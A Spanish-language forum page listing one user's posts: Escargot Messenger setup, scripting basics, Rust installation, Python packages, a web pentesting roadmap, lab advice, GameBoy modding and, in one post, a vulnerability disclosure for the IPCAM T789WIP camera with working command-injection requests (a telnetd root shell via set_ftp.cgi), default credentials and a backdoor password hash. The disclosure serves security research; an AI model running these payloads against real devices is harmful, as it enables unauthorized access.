#RemoteExecution

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - hielasangre

Páginas: 1
1


¿Qué es Escargot? 🐌
Escargot es un proyecto que ha revivido los servidores originales de MSN Messenger / Windows Live Messenger, permitiendo que los clásicos programas de chat vuelvan a funcionar tal como en los años 2000.

Página oficial: https://escargot.chat



📥 Pasos para Descargar e Instalar Escargot Messenger

1. Regístrate 
Primero, necesitas una cuenta Escargot. Regístrate aquí: 
https://escargot.chat/register

2. Descarga el cliente Messenger compatible 
Escargot ofrece versiones parcheadas de MSN y WLM. Aquí tienes los enlaces directos:


3. Instala y configura 
Ejecuta el instalador, abre el programa y accede con tu cuenta Escargot.

⚠️ Importante: 
No uses tu antigua cuenta de Hotmail/Live. Debes usar la cuenta creada en Escargot.



🖥️ Compatibilidad Multiplataforma

✅ Windows 
Totalmente compatible. Escargot fue diseñado originalmente para esta plataforma. Compatible desde Windows XP hasta Windows 11.

⚠️ Linux 
No hay cliente oficial, pero puedes usar:
  • Pidgin con protocolo MSNP: https://pidgin.im
  • Wine para ejecutar la versión de Windows de MSN Messenger

⚠️ macOS 
No hay soporte oficial moderno. Posibilidades:
  • Ejecutar MSN Messenger mediante Wine
  • Usar Adium (limitado y no actualizado)

❌ Android / iOS 
No hay apps oficiales. Algunas pruebas se han hecho con emuladores (Wine para Android, Exagear), pero no es est

2
🔍 ¿Qué es el scripting?

El scripting es la creación de scripts, es decir, archivos de texto que contienen instrucciones escritas en un lenguaje interpretado. Estas instrucciones son ejecutadas por un programa llamado intérprete, que lee y ejecuta el script línea por línea.

A diferencia de los programas tradicionales que deben ser compilados (como C o Java), los scripts son más simples, rápidos de escribir y modificar, y se ejecutan directamente sin necesidad de compilar previamente.

Citar
Ejemplo: Un script Bash puede automatizar tareas como copiar archivos, reiniciar servicios o programar respaldos, todo con unas pocas líneas.



🛠️ ¿Para qué sirve el scripting?

Los scripts se utilizan para:

  • Automatizar tareas repetitivas: como mover archivos, limpiar registros, enviar correos automáticos o generar reportes.
  • Administrar sistemas: configurar redes, instalar software, programar tareas con cron, etc.
  • Desarrollo web: controlar el comportamiento de una página en el navegador (JavaScript) o procesar formularios (PHP, Python).
  • Probar aplicaciones: realizar pruebas automatizadas sobre servicios web, bases de datos o interfaces gráficas.
  • Crear herramientas personalizadas: scripts pequeños para necesidades específicas que serían muy complejas con software tradicional.



⚙️ Lenguajes de scripting más utilizados

Aquí algunos de los lenguajes más populares para escribir scripts:

LenguajeUso principal
BashAutomatización en sistemas Linux/Unix
PythonMultipropósito: scripting, web, datos, automatización
JavaScriptInteracción en el navegador (cliente web)
PowerShellAdministración de sistemas Windows
PHPScripting del lado del servidor en sitios web



🚀 Ventajas del scripting

  • Velocidad de desarrollo: al no requerir compilación, se escribe y prueba rápidamente.
  • Simplicidad: su sintaxis suele ser más sencilla que en lenguajes de propósito general.
  • Flexibilidad: permite integrar herramientas y comandos del sistema fácilmente.
  • Automatización: reduce la intervención humana en tareas tediosas o propensas a errores.
  • Portabilidad: la mayoría de los scripts pueden ejecutarse en múltiples sistemas operativos con pocos cambios.



📌 Ejemplo práctico (Bash)

Código: (bash) [Seleccionar]
#!/bin/bash

Script para hacer copia de seguridad de una carpeta
fecha=$(date +%Y%m%d)
origen="/home/usuario/documentos"
destino="/mnt/backup/documentos_$fecha"

cp -r "$origen" "$destino"
echo "Copia realizada en $destino"

Este sencillo script en Bash crea una copia de respaldo de una carpeta con la fecha del día en el nombre del archivo. ¡Ideal para automatizar respaldos diarios!



🤔 ¿Scripting es lo mismo que programar?

 Sí y no.

Sí, porque estás escribiendo código que sigue una lógica y realiza tareas.

No, porque el scripting se enfoca más en automatizar tareas específicas que en crear aplicaciones completas o estructuradas desde cero.

Se puede pensar en el scripting como una programación ligera, directa y orientada a la acción.



💬 Conclusión

El scripting es una habilidad clave para cualquier persona que trabaje con tecnología: desde administradores de sistemas hasta desarrolladores y analistas de datos.

Citar
Recorda: si haces algo más de dos veces... ¡hacé un script!

¿Qué scripts usas en tu día a día? ¿Tenes algún consejo o truco que quieras compartir?




3
Redes / Re: [Consulta] Laboratorio en local
« en: Mayo 30, 2025, 03:25:23 pm »
Juano! Desde el punto de vista de una experiencia de probar cosas en entornos privados, te podría recomendar lo siguiente:

Recomendaciones para tu laboratorio:

Aislamiento de red: Crear una red interna (VirtualBox/NAT Network/Host-only) entre tus VMs y el host para controlar el tráfico y evitar que algo se escape.

Snapshot de tus máquinas: Así podés volver atrás luego de probar algún exploit o payload.

Agregar más víctimas con el tiempo:

Windows XP (ideal para SMBv1, EternalBlue, etc.)

Windows 10 (versiones viejas tipo 1809 o 1903 son útiles)

Linux con servicios mal configurados (Apache viejo, FTP anónimo, etc.)

Aplicaciones como DVWA, Metasploitable2/3, Juice Shop, OWASP Broken Web Apps

Simulación de red corporativa: Si querés escalar, podés incluir Active Directory, DNS, servidores compartidos, etc.

Monitoreo: Considerá instalar Wireshark o tcpdump para entender mejor qué pasa en la red durante los ataques.


Algunas ideas para practicar:

Exploits tipo EternalBlue (MS17-010), RDP, SMB.
Pivoting entre máquinas.
Escalada de privilegios local con exploits conocidos.
Ataques web contra DVWA, OWASP Juice Shop.
Creación y evasión de antivirus con payloads personalizados.


¡Mucho éxito armando el lab! Si necesitás ideas de máquinas o querés compartir avances, contá conmigo.


4
Rust / Instalar Rust en macOS, Windows y Linux
« en: Mayo 28, 2025, 04:09:04 pm »

¡Buenas a todos!
Hoy les dejo una guía rápida y clara para instalar el lenguaje de programación Rust en macOS, Windows y Linux.
Rust es rápido, seguro, moderno... y sí, muy cool. Ideal para quienes buscan rendimiento y seguridad en sus proyectos. [beastie]

🔧 Guía por sistema operativo:

📦 En macOS

Abrí la terminal.

Asegurate de tener Homebrew instalado. Si no lo tenés, ejecutá:
Código: [Seleccionar]
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Luego instalá Rust con:
Código: [Seleccionar]
brew install rustup-init && rustup-init
Seguí las instrucciones que aparecen en pantalla.

🪟 En Windows

Entrá a: https://www.rust-lang.org/tools/install

Bajá el instalador: rustup-init.exe.

Ejecutalo y seguí el asistente.

Abrí CMD o PowerShell y verificá la instalación con:
Código: [Seleccionar]
rustc --version
🐧 En Linux

Abrí tu terminal favorita.

Ejecutá:
Código: [Seleccionar]
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Presioná [Enter] para elegir la opción por defecto.

Luego hacé:
Código: [Seleccionar]
source $HOME/.cargo/env
Comprobá la instalación:
Código: [Seleccionar]
rustc --version
✅ ¿Y ahora qué?
¡Ya podés arrancar tu primer proyecto! Probá con:
Código: [Seleccionar]
cargo new mi_proyecto
Código: [Seleccionar]
cd mi_proyecto
Código: [Seleccionar]
cargo run
🔥 Bonus Tips:

Usá cargo para compilar, correr y gestionar dependencias.

Para probar cosas al vuelo: https://play.rust-lang.org/

No te olvides de leer The Rust Book, la guía oficial y gratuita.

Si alguno ya está usando Rust o quiere compartir su experiencia, bienvenido sea. [remote]

5
Python / ¿Como funciona __init__.py?
« en: Mayo 24, 2025, 04:15:37 pm »

Cuando empiezas a desarrollar proyectos más grandes en Python, es común encontrarse con un archivo llamado __init__.py. Este pequeño archivo cumple un papel importante en cómo Python estructura y organiza paquetes.

¿Qué es __init__.py?

Es un archivo especial que se coloca dentro de un directorio para indicar que dicho directorio debe ser tratado como un paquete de Python. Antes de Python 3.3, su presencia era obligatoria para que Python pudiera importar correctamente los módulos dentro del directorio.

A partir de Python 3.3, se introdujeron los namespace packages, y el archivo dejó de ser obligatorio. Sin embargo, aún se recomienda su uso para mantener el orden, compatibilidad y control del comportamiento de un paquete.

¿Para qué sirve?

El archivo __init__.py puede usarse para:

  • Inicializar código: Ejecutar instrucciones cuando se importa el paquete.
  • Exponer funciones o clases específicas: Para importar directamente sin acceder a submódulos.
  • Definir la interfaz pública del paquete: A través de la variable __all__.

Ejemplo práctico

Estructura del paquete:

Código: [Seleccionar]
mi_paquete/

├── __init__.py
├── modulo1.py
└── modulo2.py

Contenido de __init__.py:

Código: (python) [Seleccionar]
from .modulo1 import funcion1
from .modulo2 import funcion2

Esto permite importar directamente desde el paquete:

Código: (python) [Seleccionar]
from mi_paquete import funcion1, funcion2

¿Debería usarlo siempre?

Aunque ya no es estrictamente necesario desde Python 3.3, se recomienda incluir __init__.py si:

  • Quieres ejecutar código al importar el paquete.
  • Deseas controlar qué módulos o funciones estarán disponibles.
  • Buscas compatibilidad con versiones anteriores.

Conclusión

El archivo __init__.py es fundamental para crear paquetes modulares y organizados. Comprender su propósito te permitirá estructurar tus proyectos de forma más clara y profesional.

Esto es recomendable especialmente para desarrollos que impliquen modificaciones constantes. Como ejemplo se puede desarrollar una herramienta a la cual se le agregue un dominio, y los módulos tengan diferentes comportamientos, como por ejemplo, uno haga un scaneo con nmap, el otro liste directorios, etc, el limite es lo que quieras desarrollar. 

6
Off-Topic / Re: Presentacion:
« en: Mayo 24, 2025, 02:29:05 pm »
Bienvenido juano.exe, el agradecimiento es hacia vos por confiar una vez más en el foro, y andar por estos lados, vamos a tratar de darle un poco más de movimientos con temas interesantes. Todo aporte es bienvenido!

7
Off-Topic / Re: Panorama de trabajo actual
« en: Mayo 24, 2025, 02:27:50 pm »
Buenisimo el aporte bayas! Crees que eso con el tiempo pueda afectar la calidad de los pentest que se realizan?

8
Hacking / GUÍA COMPLETA PARA EMPEZAR EN PENTESTING WEB
« en: Mayo 24, 2025, 02:25:16 pm »
Esta guía es una recomendación, esta abierta a modificación y/o recomendaciones para poder hacerla lo más completa posible, con el fin de ayudar a quien quiera dar sus primeros pasos.

[remote] GUÍA COMPLETA PARA EMPEZAR EN PENTESTING WEB
Una ruta extensa y ordenada desde cero hasta nivel avanzado, enfocada exclusivamente en pruebas de penetración web.



[remote] FASE 1: FUNDAMENTOS BÁSICOS

[remote] 1. Fundamentos de Redes
  • Modelo OSI y TCP/IP
  • Protocolos: HTTP/HTTPS, DNS, TCP/UDP, FTP, SSH, SMTP
  • Conceptos clave: IP, MAC, NAT, Subnetting, Routing
  • Herramientas: ping, traceroute, netstat, nslookup, dig, nmap

[remote] Recomendaciones:

[remote] 2. Fundamentos de Sistemas Operativos (Linux)
  • Comandos Bash
  • Estructura del sistema de archivos
  • Permisos, usuarios y grupos
  • Gestión de servicios, logs y paquetes

[remote] Recomendaciones:
  • Distro: Kali Linux o Parrot OS
  • Curso: LPI Linux Essentials
  • Libro: The Linux Command Line – William Shotts

[remote] 3. Fundamentos de Programación
  • Lenguajes: Python, JavaScript, HTML, CSS, SQL
  • Uso de APIs, Web Scraping básico

[remote] Recursos:



[remote] FASE 2: CONCEPTOS DE PENTESTING

[remote] 4. Fundamentos de Ethical Hacking
  • Tipos de Pentest: Caja negra, gris, blanca
  • Fases: Recon, Scanning, Exploiting, Post, Reporte
  • Ética, legalidad y permisos

[remote] Recomendaciones:
  • Certificación: CEH (EC-Council)
  • Libro: The Web Application Hacker's Handbook

[remote] 5. Herramientas Esenciales
Código: [Seleccionar]
- Burp Suite / OWASP ZAP
- Nmap, Nikto, Wfuzz, ffuf
- Gobuster, Sublist3r, Amass
- WhatWeb, Wappalyzer
- sqlmap, Metasploit
- Dirsearch, JSBeautifier



[remote] FASE 3: OWASP TOP 10 (2021)

  • Broken Access Control
  • Cryptographic Failures
  • Injection (SQL, NoSQL, OS, LDAP)
  • Insecure Design
  • Security Misconfiguration
  • Vulnerable and Outdated Components
  • Authentication Failures
  • Software and Data Integrity Failures
  • Logging and Monitoring Failures
  • SSRF (Server-Side Request Forgery)

[remote] Recursos:



[remote]  FASE 4: PRÁCTICA

[remote] Plataformas Online:

[remote] Labs Locales con Docker:
Código: [Seleccionar]
docker pull vulnerables/web-dvwa
docker run -d -p 8080:80 vulnerables/web-dvwa



[remote] FASE 5: AVANZADO

[remote] Temas Avanzados:
  • WebSockets y seguridad
  • JSON Web Tokens (JWT) y ataques
  • SSRF y bypasses modernos
  • Prototype Pollution, DOM-based XSS
  • Cache Poisoning, CSRF avanzado

[remote] Automatización con Python:
  • Librerías: requests, BeautifulSoup, Selenium
  • Automatizar crawling, login brute force, parsing
  • Usar la API de Burp Suite



[remote] FASE 6: REPORTES Y CERTIFICACIONES

  Cómo redactar reportes:
  • Capturas de pantalla
  • Pruebas de concepto (PoC)
  • Recomendaciones de mitigación

[remote] Metodologías de referencia:
  • OWASP Testing Guide
  • PTES – Penetration Testing Execution Standard
  • NIST SP800-115

  [remote] Certificaciones recomendadas:
  • eJPT – INE
  • OSCP – Offensive Security
  • CEH – EC-Council
  • Web Academy Certificate – PortSwigger (Gratis)



[remote] BONUS: HABILIDADES ÚTILES ADICIONALES
  • Expresiones Regulares (Regex)
  • Git y control de versiones
  • Criptografía básica: Hashes, JWT, RSA, AES
  • APIs REST y GraphQL
  • OSINT para reconocimiento pasivo



[remote] LIBROS RECOMENDADOS
  • The Web Application Hacker’s Handbook
  • Hacking: The Art of Exploitation
  • Black Hat Python
  • Bug Bounty Bootcamp – Vickie Li
  • Real-World Bug Hunting – Peter Yaworski



[remote]  RECURSOS
  • Reddit: r/netsec, r/HowToHack
  • Discord: HTB, TryHackMe
  • YouTube: LiveOverflow, STÖK, TheCyberMentor
  • Twitter: @webbreacher, @g0tmi1k, @hakluke



[remote] MAPA DE RUTA RESUMIDO

Código: [Seleccionar]
1. Redes → 2. Linux → 3. Programación
     ↓
4. Fundamentos Hacking → 5. Herramientas
     ↓
6. OWASP Top 10 (a fondo) → 7. Plataformas de práctica
     ↓
8. Temas avanzados → 9. Automatización
     ↓
10. Reportes profesionales → 11. Certificaciones


9
Off-Topic / Presentate aquí
« en: Mayo 22, 2025, 11:09:14 pm »
Buenos la intención de este post es que se sientan libre de presentarse si asi lo desean y comentarnos un poco más de ustedes para que nos conozcamos un poco más.

Por mi parte, soy Daniel y por nick llevo hielasangre, actualmente en viviendo en méxico, simpatizante del software libre, el red team, y las bebidas espirituosas, con ganas de volver a la actividad en foros y desarrollar ideas copadas.

10
Electrónica y Robótica / Cambio de pantalla de GameBoy Color
« en: Mayo 18, 2025, 11:38:20 am »

Seguramente esta consola sea familiar para aquellos que crecimos en los años 90, a pesar que no pude tener una (mis posibilidades estaban más cerca del Family y del 9999 juegos en 1 ) mis padres me compraban muchas revistas de videojuegos, y en esos tiempos había muchos programas dedicadas a consolas.

Hace poco, conversando con mi esposa, hablamos de los juegos que nos gustaban de chicos y ella me comentó, que le gustaba mucho el Tetris; Por esto, dado que a veces tengo oportunidad de asistir a un Tianguis (tipo feria), donde venden muchas cosas dedicadas a los videojuegos, y a los coleccionistas de figuras de diferentes películas, compre un gameboy color en uno de los puestos.

Para mi suerte, encontré un video super explicativo y rápido publicado en Youtube por
RETROVIDEOJUEGOS TV (No me hacía sentido grabar un video mostrando como hacerlo ya que hay un montón de vídeos sobre esto). El enlace es el siguiente:


En el video figura el producto que compró el que realizó el tutorial, y yo compré el mismo, también en aliexpress. El enlace del producto es: https://es.aliexpress.com/item/4000216061721.html?spm=a2g0s.12269583.0.0.17a12f118dccza (Tardó alrededor de 15 días en llegar a mi domicilio)

El cambio de la pantalla se realiza en un máximo de 10 minutos.



En el momento de la compra no me había percatado que para la época en la que fue desarrollado los colores eran todo una novedad… Para jugar en el rayo el sol XD

Pero en estos tiempos que corren, acostumbrados a usar celulares con mejor resolución y demás… El dispositivo se queda un poco corto…

Entonces me puse en el trabajo de ver si existía algún hack o modding que nos permite agregarle una luz o iluminar de alguna forma la pantalla de la consola.





No es muy difícil desarmar la consola, se retiran las pilas y se quitan los tornillos especiales (llamados triwing) y posteriormente se retiran los que fijan la placa a la carcasa (Estos son philips)




Después de desarmarlo todo por completo, pase a retirar muy delicadamente la pantalla, despegar los flex, y probé el controlador nuevo, con la nueva pantalla (que por cierto es un poco más chica que la original).
Conecte, sin terminar de ensamblar todo, para ver si estaba conectada correctamente para conectar el sensor de brillo (con pulsar sobre la carcasa en la parte superior, el brillo disminuye, y hasta se apaga la pantalla).


Ya conforme con cómo había quedado, pasé a armar todo de nuevo… Quedando bastante bien.

Debido a que la carcasa anterior no estaba en muy buenas condiciones, la cambié por una nueva.



Realizar modding a la consola me gustó bastante, así que voy a seguir subiendo artículos relacionados a esto, voy a tratar que sean lo más originales posible (es decir, realizados por mi o por amigos) y no tanto de tutoriales de youtube u otra plataforma.


11
Hacking / Multiples vulnerabilidades en IPCAM T789WIP
« en: Mayo 18, 2025, 10:50:45 am »
Descripción del hardware:
La cámara IP inalámbrica (PnP) IPCAM T789WIP es una cámara web china que permite transmitir de forma remota.
Vendor: http://cd.ipcam.so
Versión de firmware: 48.2.64.220
Versión Dispositivo de interfaz de usuario Web Incrustado: TH2.0.1.27



A través de diferentes intentos, lo primero que me ocurrió fue ir buscando diferentes archivos, probando si se podían descargar, ya sea a por medio de una pre autenticación, o sin la misma. Los archivos que intente conseguir son los siguientes:

system.ini
system-b.ini
factory.ini
network.ini

Para esto, utilizamos las credenciales por defecto, usuario: admin y password: 888888

Código: [Seleccionar]
daniel@fuckingmachine % wget -qO- 'http://admin:888888@192.168.1.250:50569/system.ini'|xxd
000006e0: 0004 0404 0404 0100 0005 0000 0000 0000 ................
000006f0: 0100 0000 0000 0000 0000 0000 0000 0000 ................
00000700: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000710: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000720: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000730: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000740: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000750: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000760: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000770: 0000 0000 6164 6d69 6e00 0000 0000 0000 ....admin.......
00000780: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000790: 0000 0000 3838 3838 3838 0000 0000 0000 ....888888......
000007a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
000007f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000800: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000810: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000820: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000830: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00000840: 0000 0000 0000 0000 0000 0000 0000 0000 ................

Pero esto no deja nada por ahora, así que tras seguir investigando, pude dar con un RCE (Remote Command Execution) por medio de la configuración FTP.



La manera de explotarlo será por medio de set_ftp.cgi, configurando los valores utilizando el método GET para esto mismo.
En el primer resquest se setean los valores a aprovechar, y en el segundo se ejecutan, haciendo uso de ftptest.cgi para poner en funcionamiento la configuración seteada anteriormente.

Código: [Seleccionar]
daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=888888&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'

daniel@fuckingmachine % wget -qO- 'http://192.168.1.250:50569/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=888888'


Una vez ejecutado, podemos usar el binario telnetd para iniciar un acceso telnetd sin autenticación de la siguiente manera:

Código: [Seleccionar]
telnet 192.168.1.250 25
Trying 192.168.1.250...
Connected to pc192.168.1.250.
Escape character is '^]'.


BusyBox v1.12.1 (2013-07-23 17:19:11 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Y así es como podemos empezar a teclear comandos, por ejemplo ver /etc/passwd lo que revela que existe una cuenta de puerta trasera en la cámara: (Backdoor)

Código: [Seleccionar]
# cat /etc/passwd
root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#

Por tanto se puede dejar en limpio que la cámara posee múltiples vulnerabilidades:

* Credenciales por defecto (admin:888888)
* Usuario de puerta trasera (root:OYZVRABjiXqqQ:0:0:Administrator:/:/bin/sh#)
* RCE sin autenticación a través de la configuración FTP

12
Arduino / Arduino Uno - Guía rápida
« en: Mayo 18, 2025, 06:44:26 am »
Les comparto una guía rápida de Arduino UNO, bastante útil para tener a mano y evacuar dudas, o refrescar conocimientos.





13
Off-Topic / Re: Panorama de trabajo actual
« en: Mayo 17, 2025, 05:10:28 pm »
Particularmente estoy trabajando con ciberseguridad bancaria, no he visto que sea contraproducente (todavía), más bien lo veo como que puede ser un gran complemento, pero lo que si he notado que en otros trabajos del rubro de ciberseguridad si se esta usando demasiado, más de lo que me gustaría para ser honesto...

Páginas: 1